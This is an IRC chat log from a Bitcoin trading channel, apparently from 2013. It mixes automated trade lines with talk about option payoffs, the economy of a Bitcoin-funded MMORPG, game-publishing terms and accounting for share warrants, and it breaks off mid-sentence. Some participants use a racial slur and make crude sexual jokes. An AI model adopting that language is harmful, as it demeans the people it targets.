01 19:23:44 [BTCTC] [AMC-PT] 429 @ 0.001012 = 0.4341 BTC [-] Jul 01 19:23:46 [BTCTC] [AMC-PT] 1024 @ 0.00101 = 1.0342 BTC [-] Jul 01 19:24:34 [BTCTC] [AMC-PT] 1402 @ 0.001149 = 1.6109 BTC [+] Jul 01 19:24:36 [BTCTC] [AMC-PT] 500 @ 0.00115 = 0.575 BTC [+] Jul 01 19:25:54 [BTCTC] [ASICMINER-PT] 3 @ 4.61 = 13.83 BTC [-] Jul 01 19:25:56 [BTCTC] [ASICMINER-PT] 1 @ 4.605002 BTC [-] Jul 01 19:26:02 [BTCTC] [ASICMINER-PT] 4 @ 4.605002 = 18.42 BTC [-] Jul 01 19:26:57 [BTCTC] [CRYPTO-TRADE] 10 @ 0.19999 = 1.9999 BTC [+] Jul 01 19:27:26 [BTCTC] [BASIC-MINING] 1 @ 0.186899 BTC [+] Jul 01 19:27:31 [HAVELOCK] [ASICM] 6 @ 0.043156 = 0.2589 BTC [+] Jul 01 19:27:44 [BTCTC] [AMC-PT] 2984 @ 0.00115 = 3.4316 BTC [+] Jul 01 19:27:50 [BTCTC] [ASICMINER-PT] 4 @ 4.699998 = 18.8 BTC [+] Jul 01 19:28:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.046989 = 0.4699 BTC [-] Jul 01 19:28:18 [BTCTC] [BASIC-MINING] 2 @ 0.186999 = 0.374 BTC [+] Jul 01 19:29:11 [HAVELOCK] [ASICM] 1 @ 0.04316 BTC [+] Jul 01 19:29:30 [BTCTC] [AMC-PT] 114 @ 0.00115 = 0.1311 BTC [+] Jul 01 19:29:36 [HAVELOCK] [ASICM] 13 @ 0.04316 = 0.5611 BTC [+] Jul 01 19:30:15 [BTCTC] [BASIC-MINING] 1 @ 0.186999 BTC [+] Jul 01 19:31:15 [BTCTC] [DMS.SELLING] 1 @ 0.029989 BTC [+] Jul 01 19:34:04 [MPEX] [S.MPOE] 5213 @ 0.00082518 = 4.3017 BTC [-] Jul 01 19:34:07 [MPEX] [S.MPOE] 1377 @ 0.00082512 = 1.1362 BTC [-] Jul 01 19:34:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.046989 = 0.188 BTC [-] Jul 01 19:35:05 whats the equation for puts again? Jul 01 19:45:36 [BTCTC] [ASICMINER-PT] 1 @ 4.679998 BTC [-] Jul 01 19:46:46 [HAVELOCK] [HIM] 12 @ 0.289 = 3.468 BTC [-] Jul 01 19:48:47 is jurov here? Jul 01 19:51:39 mjr_ which one you mean ? Jul 01 19:52:13 was trying to graph the function Jul 01 19:52:23 but couldn't remember the put equation Jul 01 19:52:38 call is what... y = (x-strike)/strike ? Jul 01 19:52:39 [HAVELOCK] [ASICM] 9 @ 0.04452899 = 0.4008 BTC [+] Jul 01 19:53:22 [HAVELOCK] [ASICM] 1 @ 0.04452999 BTC [+] Jul 01 19:54:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.046989 = 0.188 BTC [-] Jul 01 19:54:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.046989 = 0.094 BTC [-] Jul 01 19:54:31 [HAVELOCK] [ASICM] 25 @ 0.0449 = 1.1225 BTC [+] Jul 01 19:54:43 [HAVELOCK] [ASICM] 10 @ 0.04499 = 0.4499 BTC [+] Jul 01 19:54:50 [HAVELOCK] [ASICM] 30 @ 0.04499 = 1.3497 BTC [+] Jul 01 19:54:53 yeah Jul 01 19:55:03 so put would be... Jul 01 19:55:05 and (strike-x)/strike Jul 01 19:55:20 but they are all capped at 0. positive only. Jul 01 19:55:33 [HAVELOCK] [ASICM] 4 @ 0.04499 = 0.18 BTC [+] Jul 01 19:55:40 yeah so its abs value of the difference between strike and current Jul 01 19:55:48 or should i say, 24hvwap Jul 01 19:56:53 [BTCTC] [TAT.ASICMINER] 68 @ 0.0465 = 3.162 BTC [-] Jul 01 19:57:01 yea Jul 01 19:57:08 no. Jul 01 19:57:18 [BTCTC] [ASICMINER-PT] 1 @ 4.68 BTC [+] Jul 01 19:57:21 abs (2-4) is 2 whereas the proper value is 0. Jul 01 19:57:27 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.005092 = 0.0306 BTC [-] Jul 01 19:58:12 [BTCTC] [ASICMINER-PT] 4 @ 4.7 = 18.8 BTC [+] Jul 01 19:58:44 ah good point Jul 01 19:59:00 wtf would you know about proper? Jul 01 19:59:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.0469 = 0.0938 BTC [+] Jul 01 20:00:24 [HAVELOCK] [ASICM] 3 @ 0.04498999 = 0.135 BTC [-] Jul 01 20:00:45 [BTCTC] [AMC-PT] 1150 @ 0.0011 = 1.265 BTC [-] Jul 01 20:01:23 [BTCTC] [ASICMINER-PT] 5 @ 4.7 = 23.5 BTC [+] Jul 01 20:06:26 [BTCTC] [BTC-BOND] 117 @ 0.009999 = 1.1699 BTC [+] Jul 01 20:06:27 [BTCTC] [BTC-BOND] 4 @ 0.009999 = 0.04 BTC [+] Jul 01 20:07:23 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00509 = 0.0102 BTC [-] Jul 01 20:09:23 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 01 20:09:25 [BTCTC] [ASICMINER-PT] 1 @ 4.73 BTC [+] Jul 01 20:11:34 [BTCTC] [ASICMINER-PT] 6 @ 4.739 = 28.434 BTC [+] Jul 01 20:12:10 mircea_popescu: you still around? Jul 01 20:12:22 yes Jul 01 20:12:51 imsaguy dun hate >D Jul 01 20:13:00 [BTCTC] [TAT.ASICMINER] 21 @ 0.0466 = 0.9786 BTC [-] Jul 01 20:13:05 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [-] Jul 01 20:13:07 [BTCTC] [ASICMINER-PT] 2 @ 4.6061 = 9.2122 BTC [-] Jul 01 20:13:10 [BTCTC] [ASICMINER-PT] 1 @ 4.57 BTC [-] Jul 01 20:13:12 [BTCTC] [ASICMINER-PT] 21 @ 4.56 = 95.76 BTC [-] Jul 01 20:13:14 [BTCTC] [ASICMINER-PT] 1 @ 4.555 BTC [-] Jul 01 20:13:16 [BTCTC] [ASICMINER-PT] 14 @ 4.5542 = 63.7588 BTC [-] Jul 01 20:13:18 [BTCTC] [ASICMINER-PT] 65 @ 4.554 = 296.01 BTC [-] Jul 01 20:13:20 [BTCTC] [ASICMINER-PT] 1 @ 4.54505 BTC [-] Jul 01 20:13:24 [BTCTC] [ASICMINER-PT] 1 @ 4.54505 BTC [-] Jul 01 20:14:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.0465 = 0.093 BTC [-] Jul 01 20:15:07 [BTCTC] [TAT.ASICMINER] 8 @ 0.0465 = 0.372 BTC [-] Jul 01 20:15:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.046 = 0.46 BTC [-] Jul 01 20:15:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.0459 = 0.6885 BTC [-] Jul 01 20:15:13 [BTCTC] [TAT.ASICMINER] 100 @ 0.0456 = 4.56 BTC [-] Jul 01 20:15:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.0456 = 0.1368 BTC [-] Jul 01 20:15:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.04525 = 0.1358 BTC [-] Jul 01 20:15:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.045003 = 0.45 BTC [-] Jul 01 20:15:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.045003 = 0.09 BTC [-] Jul 01 20:15:21 [BTCTC] [TAT.ASICMINER] 193 @ 0.045 = 8.685 BTC [-] Jul 01 20:16:35 [HAVELOCK] [ASICM] 22 @ 0.0449 = 0.9878 BTC [-] Jul 01 20:17:31 [MPEX] [S.MPOE] 1323 @ 0.00082512 = 1.0916 BTC [-] Jul 01 20:17:32 [MPEX] [S.MPOE] 1827 @ 0.00082475 = 1.5068 BTC [-] Jul 01 20:19:17 [HAVELOCK] [ASICM] 3 @ 0.04460005 = 0.1338 BTC [-] Jul 01 20:19:29 [HAVELOCK] [ASICM] 45 @ 0.04460001 = 2.007 BTC [-] Jul 01 20:19:37 mircea_popescu: okay so when money is deposited into the tentative game Jul 01 20:19:45 it creates drops/loot/items/shit in general Jul 01 20:19:58 okay so my question is you will withdraw from this pool? Jul 01 20:20:03 to pay niggas? Jul 01 20:20:17 niggas being developers staff in general Jul 01 20:22:11 [HAVELOCK] [ASICM] 9 @ 0.0449 = 0.4041 BTC [+] Jul 01 20:22:35 nope. Jul 01 20:22:56 . The value of destroyed items (such as principally food, which will be required for all players) will instead cover game development and operational costs. Jul 01 20:23:04 it's right in there you know, the 2nd paragraph of point i Jul 01 20:23:46 [HAVELOCK] [ASICM] 26 @ 0.04460001 = 1.1596 BTC [-] Jul 01 20:24:19 ;;getrating BTC0xygen Jul 01 20:24:19 This user has not yet been rated. WARNING: Currently not authenticated. Jul 01 20:24:51 ;;getrating BTCOxygen Jul 01 20:24:51 WARNING: Currently not authenticated. User BTCOxygen, rated since Sun Mar 10 13:32:15 2013. Cumulative rating 51, from 24 total ratings. Received ratings: 22 positive, 2 negative. Sent ratings: 22 positive, 2 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=BTCOxygen Jul 01 20:24:55 [BTCTC] [TAT.ASICMINER] 600 @ 0.045 = 27 BTC [-] Jul 01 20:25:00 where can i read about it? Jul 01 20:25:04 [BTCTC] [DMS.PURCHASE] 110 @ 0.049418 = 5.436 BTC [-] Jul 01 20:25:17 if you mean the rpg, here http://trilema.com/2013/statements-regarding-the-mmorpg-under-development-i-v/ Jul 01 20:26:57 mircea_popescu: okay so there is a "subscription" cost? Jul 01 20:26:58 I would steer clear aof said user IMO Jul 01 20:26:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.04381 = 0.6572 BTC [-] Jul 01 20:27:02 of Jul 01 20:27:23 you've solved entropa's cash flow problem Jul 01 20:27:37 there's a sort-of subscription cost. Jul 01 20:27:48 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [-] Jul 01 20:27:54 well the cashflow comes from users having to "live" aka food Jul 01 20:27:58 jborkl notably actually there's two of them here, one with an o one with a 0 Jul 01 20:28:05 yes thestringpuller. Jul 01 20:28:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.043811 = 1.3143 BTC [+] Jul 01 20:28:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.04381 = 0.3067 BTC [-] Jul 01 20:28:15 [BTCTC] [TAT.ASICMINER] 32 @ 0.043803 = 1.4017 BTC [-] Jul 01 20:28:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.043802 = 0.876 BTC [-] Jul 01 20:28:18 entropa's problem was that there was no cashflow Jul 01 20:28:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.043501 = 0.87 BTC [-] Jul 01 20:28:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.043 = 0.258 BTC [-] Jul 01 20:28:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.042801 BTC [-] Jul 01 20:28:26 people dumped money into the pool Jul 01 20:28:36 the catch is that higher powered players will probably want the higher powered effects of food, and thus subscription for leet ppl will be higher than subscriotion for noobs. Jul 01 20:28:37 but there was no "flow" Jul 01 20:28:52 that's a little scandalous imo Jul 01 20:29:22 whyssat ? Jul 01 20:29:46 well first answer this, can you trade for food? Jul 01 20:29:50 or moreover Jul 01 20:29:53 yes, you trade and craft it. Jul 01 20:29:56 [BTCTC] [ASICMINER-PT] 2 @ 4.46 = 8.92 BTC [-] Jul 01 20:30:00 lemme rephrase Jul 01 20:30:14 are there any "unique" destroyable items in the game that are destroyable Jul 01 20:30:18 by unique I mean player bound Jul 01 20:30:25 as in the player can not relinquish it Jul 01 20:30:30 nope. Jul 01 20:30:50 okay then it's not so scandalous Jul 01 20:30:55 there are no bound items in general, that's bullshit/nonsense made by bad designers Jul 01 20:30:59 to try and stem the tide Jul 01 20:31:13 anyway, re food : you can live your entire life on iron rats. Jul 01 20:31:34 it's just if you want tio have a bottle of elven wine or w/e, well... it's gonna cost you more. deal with it or else go back to springwater Jul 01 20:31:49 sorta like irl, you can live on army rations just fine. Jul 01 20:31:57 that wasn't really my point Jul 01 20:31:57 [BTCTC] [ASICMINER-PT] 1 @ 4.4506 BTC [-] Jul 01 20:31:59 [BTCTC] [ASICMINER-PT] 2 @ 4.45 = 8.9 BTC [-] Jul 01 20:32:02 ah Jul 01 20:32:50 so if you use the emergence to your advantage there could be a n00b that rises to power without depositing any money at all Jul 01 20:32:56 sure. Jul 01 20:32:57 which makes it less scandalous imo Jul 01 20:33:11 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 01 20:33:13 he trades and uses skill to go from pusherman to godfather Jul 01 20:33:18 similar to the anarchy of eve Jul 01 20:33:25 many will try, few will succeed, life moves right on Jul 01 20:33:38 well sure Jul 01 20:33:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.0449 = 0.3143 BTC [+] Jul 01 20:33:50 but the emergence will be your friend you realize this no? Jul 01 20:33:53 hmmm, so would it be potentially possible to profit by playing? Jul 01 20:33:57 what you mean by emergence ? Jul 01 20:33:57 [HAVELOCK] [ASICM] 8 @ 0.04460001 = 0.3568 BTC [-] Jul 01 20:33:59 mjr_ yes. Jul 01 20:34:04 very cool Jul 01 20:34:09 i like this already Jul 01 20:34:19 [BTCTC] [ASICMINER-PT] 10 @ 3.35 = 33.5 BTC [-] Jul 01 20:34:21 [BTCTC] [TAT.ASICMINER] 8 @ 0.0449 = 0.3592 BTC [+] Jul 01 20:34:21 it;'s for bitcoin ffs. how else ? Jul 01 20:34:28 emergent gameplay is created by the game doing things the designer didn't intend but exists anyways Jul 01 20:34:38 eve's anarchy is a textbook example Jul 01 20:34:44 it just happens Jul 01 20:34:49 thestringpuller im of a diff philosophy. it's not my job to micromanage the player/make poaths etc. Jul 01 20:34:56 it's my job to crerate a level playing field. Jul 01 20:35:07 but that's what I'm getting at Jul 01 20:35:12 right Jul 01 20:35:20 you see with emergence the players create their own world so to speak Jul 01 20:35:25 exactly the idea. Jul 01 20:35:35 that is a great strategy Jul 01 20:35:37 that's why Eve remains successful in the face of WoW Jul 01 20:35:43 probably taken to extremes as players will be able to create their own code/gfx etc too Jul 01 20:35:48 course they kinda suck at it so far, but hey. Jul 01 20:35:51 mebbe in time Jul 01 20:36:02 you should watch an anime called .hack//sign Jul 01 20:36:06 if you capture a small portion of WoW players in china it will be a smashing success Jul 01 20:36:10 and i think you are doing that Jul 01 20:36:12 that's pretty much what your game will become Jul 01 20:36:19 by introducing monetization Jul 01 20:36:40 i would "recommend" reading REAMDE, it talks a lot about such things and I hope this becomes something like that Jul 01 20:36:41 cool then Jul 01 20:36:56 [BTCTC] [ASICMINER-PT] 1 @ 4.468 BTC [+] Jul 01 20:37:08 what you'll have is stuff appearing in the code you never thought could exist Jul 01 20:37:12 but will there be blocks out of which we can build things?!?! Jul 01 20:37:27 get the fuck out of here imsaguy with that minecraft shit Jul 01 20:37:27 imsaguy the usual. blender. what have you Jul 01 20:37:32 most of the code is open source anyway Jul 01 20:37:48 will there be zombies? Jul 01 20:37:54 [BTCTC] [DMS.SELLING] 10 @ 0.029989 = 0.2999 BTC [+] Jul 01 20:38:15 get the fuck out of here with that left 4 dead shit imsaguy Jul 01 20:38:22 lol Jul 01 20:38:23 jkjk Jul 01 20:38:32 [BTCTC] [TAT.ASICMINER] 200 @ 0.045 = 9 BTC [+] Jul 01 20:38:39 thestringpuller: hey assmuch, there are a lot more games than left4dead that have zombies. Jul 01 20:38:40 so apparently the forum has a hole in it allowing acct hijacks Jul 01 20:38:44 assmunch* Jul 01 20:38:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [+] Jul 01 20:38:52 mircea_popescu: as expected. Jul 01 20:38:52 imsaguy eventually. Jul 01 20:39:06 mircea_popescu: as expected (again). Jul 01 20:39:19 mircea_popescu: so how will players build things? as imsaguy alluded to, the crafting... Jul 01 20:39:20 most of the game content will depend on the playerbase in-game building towards it. Jul 01 20:39:26 as in finding recipes and whatnot. Jul 01 20:39:32 okay but how? Jul 01 20:39:33 recipes? Jul 01 20:39:37 resources in ground? Jul 01 20:39:39 wtf is this? the foodnetwork game? Jul 01 20:39:46 for one, yes, resources in the ground. Jul 01 20:39:50 cooking mama Jul 01 20:39:54 but if you want the nice sword the orcs have either you trade with them Jul 01 20:39:58 diner dash 2.0 Jul 01 20:40:00 or else bash them, steal the swords, copy the design Jul 01 20:40:07 one does not trade with orcs Jul 01 20:40:15 the only trading with an orc you do is once its dead. Jul 01 20:40:16 then enjoy being an orc cocksock. Jul 01 20:40:18 one does not simply walk into orc-land Jul 01 20:40:40 [BTCTC] [TAT.ASICMINER] 17 @ 0.045 = 0.765 BTC [+] Jul 01 20:41:17 [BTCTC] [ASICMINER-PT] 2 @ 4.46899 = 8.938 BTC [+] Jul 01 20:41:21 [BTCTC] [ASICMINER-PT] 1 @ 4.46899 BTC [+] Jul 01 20:42:15 [BTCTC] [ASICMINER-PT] 2 @ 4.469 = 8.938 BTC [+] Jul 01 20:42:32 so mircea_popescu so resources are finite based on btc flow? Jul 01 20:42:46 yes. Jul 01 20:42:57 [HAVELOCK] [ASICM] 35 @ 0.0446 = 1.561 BTC [-] Jul 01 20:43:33 [HAVELOCK] [ASICM] 9 @ 0.0446 = 0.4014 BTC [-] Jul 01 20:43:37 yay there will be cartels!!!!!! Jul 01 20:43:52 lol Jul 01 20:44:16 so i don't know mircea_popescu if you've played eve Jul 01 20:44:20 well actually, the idea is all towns will be player made/controlled Jul 01 20:44:20 but there was this war they had Jul 01 20:44:54 so will be various means of transportation (roads, teleports, what have you) Jul 01 20:45:13 yea so mircea_popescu you will have cartels guarenteed Jul 01 20:45:23 but this will depend on playerbase Jul 01 20:45:27 thestringpuller i was invited in the beta of eq2 and wow - they came out about the same time Jul 01 20:45:31 cartels make for more fun Jul 01 20:45:35 the more players the more fun Jul 01 20:45:35 they both sucked, imo. quit before they opened for public Jul 01 20:45:36 try playing eve solo Jul 01 20:45:45 lol Jul 01 20:45:52 benkay_: Not fun at all Jul 01 20:45:56 esp the eq crafting system was retarded. Jul 01 20:46:06 well the wow too, but from wow i didn't expect anything Jul 01 20:46:15 blizzard never got crafting, fuck the horadrim cube. Jul 01 20:46:22 da fuck? Jul 01 20:46:24 that's d2 Jul 01 20:46:29 so ? Jul 01 20:46:40 d2 didn't need no stinkin' crafting Jul 01 20:46:41 [HAVELOCK] [ASICM] 3 @ 0.04489999 = 0.1347 BTC [+] Jul 01 20:46:43 d2 is crack Jul 01 20:46:49 [BTCTC] [DMS.PURCHASE] 2 @ 0.049418 = 0.0988 BTC [-] Jul 01 20:46:52 i don't argue that. Jul 01 20:46:55 you play it for 2 hours get your fix and then shake in the corner Jul 01 20:47:00 but if you want to be a d2 crafter... gl lol Jul 01 20:48:46 [HAVELOCK] [ASICM] 19 @ 0.0449 = 0.8531 BTC [+] Jul 01 20:52:22 [BTCTC] [AMC-PT] 435 @ 0.0011 = 0.4785 BTC [-] Jul 01 20:53:51 [BTCTC] [TAT.ASICMINER] 15 @ 0.045 = 0.675 BTC [+] Jul 01 20:58:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.045 = 0.45 BTC [+] Jul 01 20:59:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.045 = 0.315 BTC [+] Jul 01 20:59:25 [BTCTC] [ASICMINER-PT] 23 @ 4.5 = 103.5 BTC [+] Jul 01 21:04:15 [MPEX] [S.MPOE] 9073 @ 0.00082475 = 7.483 BTC [-] Jul 01 21:04:17 [MPEX] [S.MPOE] 2327 @ 0.00082467 = 1.919 BTC [-] Jul 01 21:06:03 [HAVELOCK] [ASICM] 10 @ 0.04489999 = 0.449 BTC [-] Jul 01 21:06:11 s.mg june statement if anyone wants to weigh in on btc accounting standards >> http://trilema.com/2013/smg-june-2013-statement/ Jul 01 21:09:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [+] Jul 01 21:11:23 ;;nethash Jul 01 21:11:24 168888.580036 Jul 01 21:12:38 mircea_popescu has anyone besides myself approached you for publishing? Jul 01 21:13:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [+] Jul 01 21:14:12 yes. Jul 01 21:14:50 mircea_popescu: why don't you present the usual assets/liabilities balance sheet in addition to the cash flows and accounts list ? Jul 01 21:14:52 nice what will the publishing platform look like? Jul 01 21:15:06 [HAVELOCK] [ASICM] 8 @ 0.04489999 = 0.3592 BTC [-] Jul 01 21:15:20 davout cause i figured this is much shorter, easier to read and easier to comprehend by even moderately literate business ppl. Jul 01 21:15:29 do you think anything gets hurt ? Jul 01 21:15:40 thestringpuller how do you mean ? Jul 01 21:15:48 someone brings you game Jul 01 21:15:52 it is sellable Jul 01 21:15:59 how does S.MG publish? Jul 01 21:16:16 you going to go door to door in romania? Jul 01 21:16:18 :P Jul 01 21:16:30 depends on the game, really. Jul 01 21:16:45 my game for instance a 2d standalone Jul 01 21:16:48 which is frustratingly vague, yes, i know Jul 01 21:17:11 i guess we will see next week Jul 01 21:17:13 :D Jul 01 21:17:17 hehe k Jul 01 21:19:02 lemme ask this Jul 01 21:19:07 what is the max cut S.MG would take... Jul 01 21:19:12 i know that is negotiable Jul 01 21:19:16 but humor me :) Jul 01 21:19:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.045 = 0.9 BTC [+] Jul 01 21:20:29 [BTCTC] [S.MPOE-PT] 18 @ 0.000864 = 0.0156 BTC [-] Jul 01 21:20:44 mircea_popescu: i think an assets/liabilities is quite useful, i think it gives a quite synthetic and understandable picture of the situation, it is expected by people who are used to accounting, and is easy enough to understand for anyone who has any business reading financial statements anyway Jul 01 21:20:46 it's negotiable in the following sense. you have a game which we suppose agree took 1k btc to make. if we agree it's sensible i spend 1k btc pushing it then i expect half the revenue. Jul 01 21:21:02 if we agree it makes no sense to spend over 100 btc then i want something like 10% Jul 01 21:21:10 but you said you don't like advertising... Jul 01 21:21:13 the numeric application is only there to make the point Jul 01 21:21:19 I see Jul 01 21:21:22 what i like makes no difference, this is biznis neh ? Jul 01 21:21:26 thestringpuller: i tell my friends i don't like fat chicks Jul 01 21:21:28 harharharhar Jul 01 21:21:42 davout you perhaps jhave a good point here Jul 01 21:21:46 u guise Jul 01 21:22:03 but fat chicks are kinda good in bed if they aren't too fat Jul 01 21:22:05 "Curvy" Jul 01 21:22:11 davout you figure turn the present "accounts" thing into more of a normal balance ? Jul 01 21:22:44 mircea_popescu: something that sums to zero is, and has always been the easiest thing to check Jul 01 21:23:09 mircea_popescu: take your accounts list Jul 01 21:23:18 okay. i kinda have to ditch the start/change/end format then, Jul 01 21:23:24 but i guess that's kind of redundant anyway Jul 01 21:23:32 mircea_popescu: your model reminds me of the 80's Jul 01 21:23:42 when people would take a floppy Jul 01 21:23:42 no, because you put it in front of the capital Jul 01 21:23:46 thestringpuller 1880s ? Jul 01 21:23:48 and put it up in the local story Jul 01 21:23:53 store* Jul 01 21:23:56 the best is to have it all Jul 01 21:24:18 davout well the best that has it all is the 500 page ifrs Jul 01 21:24:27 take your accounts list, add a column, toss the capital on the right side, poof, sums to zero Jul 01 21:24:28 i don't think 500 page reports are actually useful in btc atm Jul 01 21:24:40 hm Jul 01 21:24:49 mircea_popescu: when did my additional table turn into 500 pages ? :-) Jul 01 21:24:59 may i bitch ? Jul 01 21:25:10 mircea_popescu: don't you already pay someone for this ? Jul 01 21:25:15 mircea_popescu: man up and send her Jul 01 21:25:20 XD Jul 01 21:25:27 okay, be my guest Jul 01 21:25:30 she doesn't like IRC Jul 01 21:25:37 she's afraid of real time interaction Jul 01 21:25:46 cause all the nerds will try to get in her pants Jul 01 21:25:48 thestringpuller: they all bleed a bit the first time you know Jul 01 21:25:55 yup Jul 01 21:27:04 davout http://trilema.com/2013/smg-june-2013-statement/ Jul 01 21:27:07 how do you like that ? Jul 01 21:27:17 unbeknownst to us MPOE-PR is eavesdropping here Jul 01 21:27:33 mircea_popescu: you made me use a credit to refresh the page Jul 01 21:27:36 come on Jul 01 21:27:38 ol Jul 01 21:27:38 lol Jul 01 21:27:39 jkjk Jul 01 21:27:55 as they say in washington dc, Jul 01 21:27:58 fuck you, pay me. Jul 01 21:28:01 mircea_popescu: i am pleased Jul 01 21:28:11 do you perhaps want me to add charges for the warrants too ? Jul 01 21:28:24 mircea_popescu: i'm more used to have it presented in two different columns but the info is here Jul 01 21:28:47 btw is there any difference between "shareholders equity" and "capital" or are they synonyms ? Jul 01 21:29:01 ya well, i can't make 12 columns as i don't want to turn my blog into an aicraft carrier Jul 01 21:29:11 not synonims, no Jul 01 21:29:15 but no difference either. Jul 01 21:29:15 mircea_popescu: yea, that was just me whining Jul 01 21:29:41 capital is usually short for operating capital Jul 01 21:30:08 the way i define capital is "the debt to the shareholders" Jul 01 21:30:28 that's nonsense, as the shareholders aren't owed any btc. Jul 01 21:30:33 operating capital would be something else by me, but that might just be my english Jul 01 21:30:47 [BTCTC] [DMS.SELLING] 19 @ 0.029989 = 0.5698 BTC [+] Jul 01 21:31:00 capital is a liability to the shareholders Jul 01 21:31:04 yes it is Jul 01 21:31:18 so ? what are we arguing? Jul 01 21:31:27 but an equitable point, rather than an owed debt Jul 01 21:31:37 we're aguing incredibly fine points of legalese. Jul 01 21:31:40 [BTCTC] [DMS.SELLING] 50 @ 0.0291 = 1.455 BTC [-] Jul 01 21:31:51 mircea_popescu: i'm getting hard, let's go on Jul 01 21:32:05 basically the shareholders have no title claim to the capital they put in Jul 01 21:32:08 but merely an equitable claim Jul 01 21:32:33 in the simplest translation of common law that even a napoleonic lout might get, they don't have tyhe right to THAT capital. just to something equivalent, as practicable. Jul 01 21:32:53 the distinction comes fromwhether you can claim to be given THE lost sheep, or A sheep in place of THE sheep. Jul 01 21:32:58 i'm not sure of the nuance you're making here but if it's something saying that the shareholder can't simply knock on the door and get the nominal value of his share paid to him then i agree :-) Jul 01 21:33:08 something like that yes. Jul 01 21:33:13 word Jul 01 21:33:18 it has plenty of implications. Jul 01 21:33:24 i'm not really sure about what you said earlier about the warrants Jul 01 21:33:50 yea, it's not "debt", guess i misused the word :-) Jul 01 21:33:52 technically speaking they should be in the accounts as they're a materially different situation than simply not existing Jul 01 21:33:59 the warrants ? Jul 01 21:34:01 exactly HOW you account for outstanding warrants however... Jul 01 21:34:12 i need to re-read how they are defined Jul 01 21:34:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.045 = 0.27 BTC [+] Jul 01 21:34:27 right to acquire shares at specified price after specified date. Jul 01 21:34:37 like a stock option, right ? Jul 01 21:35:00 exactly. Jul 01 21:35:11 [BTCTC] [AMC-PT] 1000 @ 0.00103 = 1.03 BTC [-] Jul 01 21:35:24 [BTCTC] [ASICMINER-PT] 3 @ 4.550006 = 13.65 BTC [+] Jul 01 21:36:46 [BTCTC] [AMC-PT] 230 @ 0.00101 = 0.2323 BTC [-] Jul 01 21:37:22 very good question Jul 01 21:37:26 ty ty Jul 01 21:37:45 is there any form of risk associated for MG ? Jul 01 21:37:54 yes. for instance, it could suck. Jul 01 21:38:08 no, i mean, will the shares be created out of thin air ? Jul 01 21:38:12 or will they be bought Jul 01 21:38:13 ? Jul 01 21:38:16 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [-] Jul 01 21:38:20 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 01 21:38:22 [BTCTC] [ASICMINER-PT] 4 @ 4.5 = 18 BTC [-] Jul 01 21:38:27 bought at the price. having a warrant for 1 share at 1 btc means you pay 1 btc get the share Jul 01 21:38:29 [BTCTC] [ASICMINER-PT] 3 @ 4.599951 = 13.7999 BTC [+] Jul 01 21:38:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [+] Jul 01 21:38:37 the only catch is that the par value of that share by then MAY be higher Jul 01 21:38:42 that's not what I mean Jul 01 21:39:20 will the shares be summoned into existence by MG or will MG buy the shares at market price and resell them to the holders of a warrant at the agreed-upon price ? Jul 01 21:39:26 the former. Jul 01 21:39:37 basically, the us govt bonds are in fact us govt stock warrants Jul 01 21:39:37 ok, so there's zero risk for MG Jul 01 21:39:44 whenever they come due they just issue more dollarsd and pay Jul 01 21:39:47 let's not get into this right now Jul 01 21:39:51 ok :) Jul 01 21:39:55 [BTCTC] [AMC-PT] 72 @ 0.00107 = 0.077 BTC [+] Jul 01 21:40:15 there's zero risk for MG, the ones actually bearing a risk are the shareholders, not MG Jul 01 21:40:25 there's really nothing to provision Jul 01 21:40:40 there may be nothing to provision in that perspective, however, Jul 01 21:40:46 [BTCTC] [AMC-PT] 2 @ 0.00107 = 0.0021 BTC [+] Jul 01 21:40:56 it could be argued that a company with issued sws is worth less than the same w/o having issued them Jul 01 21:40:57 [HAVELOCK] [ASICM] 4 @ 0.04489999 = 0.1796 BTC [-] Jul 01 21:41:04 this has to be accounted as this is the point of accountingh Jul 01 21:41:10 just account for it as exceptional revenue when it comes in, if it does, any loss relative to the par market price will be borne by shareholders getting diluted at a bargain Jul 01 21:41:58 that yes. Jul 01 21:42:03 mircea_popescu: it doesn't have to be accounted for per-se, but the warrants list has to come with the financial statements, because as you said it is something that needs to be taken into account to get a full picture of the company Jul 01 21:42:08 anyway. i did include a disclosure, so. Jul 01 21:42:14 [BTCTC] [AMC-PT] 1 @ 0.00107 BTC [+] Jul 01 21:42:21 right. Jul 01 21:42:26 which is good, the contrary wouldn't have been right Jul 01 21:43:29 it starts getting fun when you think that management might want to cover the "unfair" dilution risk by hedging the warrants using inside information Jul 01 21:43:44 especially if said management holds shares :-) Jul 01 21:43:52 [BTCTC] [CRYPTO-TRADE] 14 @ 0.19999 = 2.7999 BTC [+] Jul 01 21:44:02 management holds a 